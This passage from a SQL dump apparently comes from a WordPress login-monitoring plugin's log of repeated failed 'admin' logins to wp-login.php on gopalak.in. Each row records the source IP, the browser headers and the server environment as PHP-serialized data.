\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746917467.093596;s:12:\"REQUEST_TIME\";i:1746917467;}}','91.151.95.70',0,'2025-05-11 04:21:08','1970-01-01 00:00:00'),(95382,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51946\";s:11:\"REMOTE_ADDR\";s:12:\"54.39.48.216\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746917826.722127;s:12:\"REQUEST_TIME\";i:1746917826;}}','54.39.48.216',0,'2025-05-11 04:27:08','1970-01-01 00:00:00'),(95383,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37186\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.18\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746918188.6876869;s:12:\"REQUEST_TIME\";i:1746918188;}}','198.54.114.18',0,'2025-05-11 04:33:10','1970-01-01 00:00:00'),(95384,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37654\";s:11:\"REMOTE_ADDR\";s:14:\"185.232.41.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746918543.7724731;s:12:\"REQUEST_TIME\";i:1746918543;}}','185.232.41.148',0,'2025-05-11 04:39:05','1970-01-01 00:00:00'),(95385,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63516\";s:11:\"REMOTE_ADDR\";s:14:\"209.97.131.236\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746918905.3773489;s:12:\"REQUEST_TIME\";i:1746918905;}}','209.97.131.236',0,'2025-05-11 04:45:07','1970-01-01 00:00:00'),(95386,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42252\";s:11:\"REMOTE_ADDR\";s:14:\"103.191.76.181\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746919262.306319;s:12:\"REQUEST_TIME\";i:1746919262;}}','103.191.76.181',0,'2025-05-11 04:51:04','1970-01-01 00:00:00'),(95387,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45764\";s:11:\"REMOTE_ADDR\";s:13:\"15.204.43.173\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746919619.0217371;s:12:\"REQUEST_TIME\";i:1746919619;}}','15.204.43.173',0,'2025-05-11 04:57:00','1970-01-01 00:00:00'),(95388,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33778\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.161\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746919976.22821;s:12:\"REQUEST_TIME\";i:1746919976;}}','199.188.201.161',0,'2025-05-11 05:02:58','1970-01-01 00:00:00'),(95389,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39908\";s:11:\"REMOTE_ADDR\";s:14:\"192.64.117.254\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746920333.7232649;s:12:\"REQUEST_TIME\";i:1746920333;}}','192.64.117.254',0,'2025-05-11 05:08:55','1970-01-01 00:00:00'),(95390,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"32958\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.141.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746920693.4156561;s:12:\"REQUEST_TIME\";i:1746920693;}}','66.29.141.59',0,'2025-05-11 05:14:55','1970-01-01 00:00:00'),(95391,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43322\";s:11:\"REMOTE_ADDR\";s:13:\"199.188.206.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746921050.434974;s:12:\"REQUEST_TIME\";i:1746921050;}}','199.188.206.2',0,'2025-05-11 05:20:52','1970-01-01 00:00:00'),(95392,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 